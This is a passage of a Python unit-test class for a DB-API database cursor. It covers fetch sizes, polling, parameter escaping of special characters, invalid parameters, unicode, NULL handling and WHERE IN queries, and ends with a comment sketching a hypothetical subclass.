@with_cursor
def test_arraysize(self, cursor):
cursor.arraysize = 5
cursor.execute('SELECT * FROM many_rows LIMIT 20')
self.assertEqual(len(cursor.fetchmany()), 5)
@with_cursor
def test_polling_loop(self, cursor):
"""Try to trigger the polling logic in fetchone()"""
cursor._poll_interval = 0
cursor.execute('SELECT COUNT(*) FROM many_rows')
self.assertEqual(cursor.fetchone(), (10000,))
@with_cursor
def test_no_params(self, cursor):
cursor.execute("SELECT '%(x)s' FROM one_row")
self.assertEqual(cursor.fetchall(), [('%(x)s',)])
def test_escape(self):
"""Verify that funny characters can be escaped as strings and SELECTed back"""
bad_str = '''`~!@#$%^&*()_+-={}[]|\\;:'",./<>?\n\r\t '''
self.run_escape_case(bad_str)
@with_cursor
def run_escape_case(self, cursor, bad_str):
cursor.execute(
'SELECT %d, %s FROM one_row',
(1, bad_str)
)
self.assertEqual(cursor.fetchall(), [(1, bad_str,)])
cursor.execute(
'SELECT %(a)d, %(b)s FROM one_row',
{'a': 1, 'b': bad_str}
)
self.assertEqual(cursor.fetchall(), [(1, bad_str)])
@with_cursor
def test_invalid_params(self, cursor):
self.assertRaises(exc.ProgrammingError, lambda: cursor.execute('', 'hi'))
self.assertRaises(exc.ProgrammingError, lambda: cursor.execute('', [object]))
def test_open_close(self):
with contextlib.closing(self.connect()):
pass
with contextlib.closing(self.connect()) as connection:
with contextlib.closing(connection.cursor()):
pass
@with_cursor
def test_unicode(self, cursor):
unicode_str = "王兢"
cursor.execute(
'SELECT %s FROM one_row',
(unicode_str,)
)
self.assertEqual(cursor.fetchall(), [(unicode_str,)])
@with_cursor
def test_null(self, cursor):
cursor.execute('SELECT null FROM many_rows')
self.assertEqual(cursor.fetchall(), [(None,)] * 10000)
cursor.execute('SELECT IF(a % 11 = 0, null, a) FROM many_rows')
self.assertEqual(cursor.fetchall(), [(None if a % 11 == 0 else a,) for a in range(10000)])
@with_cursor
def test_sql_where_in(self, cursor):
cursor.execute('SELECT * FROM many_rows where a in %s', ([1, 2, 3],))
self.assertEqual(len(cursor.fetchall()), 3)
cursor.execute('SELECT * FROM many_rows where b in %s limit 10',
(['blah'],))
self.assertEqual(len(cursor.fetchall()), 10)
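# Illustrative subclass sketch (an assumption, not part of the original module):
# a concrete test case mixes this base class with unittest.TestCase and only has
# to implement connect(); the driver module and connection call below are hypothetical.
#
#   class MyDBAPITestCase(unittest.TestCase, DBAPITestCase):
#       def connect(self):
#           return my_dbapi_module.connect(host='localhost')  # hypothetical driver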
|